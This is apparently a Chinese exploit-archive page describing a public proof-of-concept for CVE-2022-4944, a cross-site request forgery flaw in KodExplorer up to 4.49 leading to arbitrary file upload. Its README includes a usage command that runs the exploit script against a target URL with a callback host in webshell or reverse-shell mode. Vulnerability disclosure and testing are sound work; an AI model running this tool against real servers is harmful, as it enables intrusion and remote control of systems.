POC详情: 87826521d6ca90e566976ed556cde9cb15c66c52

来源
https://github.com/brosck/CVE-2022-4944
关联漏洞
标题: KodExplorer 跨站请求伪造漏洞 (CVE-2022-4944)
描述:KodExplorer是warlee个人开发者的一个 web 文件管理器。 KodExplorer 4.49 之前版本存在跨站请求伪造漏洞,该漏洞源于存在未知函数,导致跨站请求伪造漏洞。
描述
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
介绍
<h1 align="center">「💥」CVE-2022-4944</h1>

<p align="center"><img height="600" src="https://raw.githubusercontent.com/kalcaddle/static/master/images/kod/common2.png"></p>

## Description

A vulnerability, which was classified as problematic, was found in kalcaddle KodExplorer up to 4.49. This affects an unknown part. The manipulation leads to cross-site request forgery. This vulnerability is uniquely identified as CVE-2022-4944. It is possible to initiate the attack remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

## Demo

![demo](demo.png)

## Usage

```
pip install requests
git clone https://github.com/MrEmpy/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode
```

## Reference

* https://vuldb.com/?id.227000
* https://www.cve.org/CVERecord?id=CVE-2022-4944
文件快照

 [4.0K]  /data/pocs/87826521d6ca90e566976ed556cde9cb15c66c52
├── [3.7K]  CVE-2022-4944.py
├── [1.0K]  CVE-2022-4944.yaml
├── [213K]  demo.png
├── [ 34K]  LICENSE
└── [ 922]  README.md

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。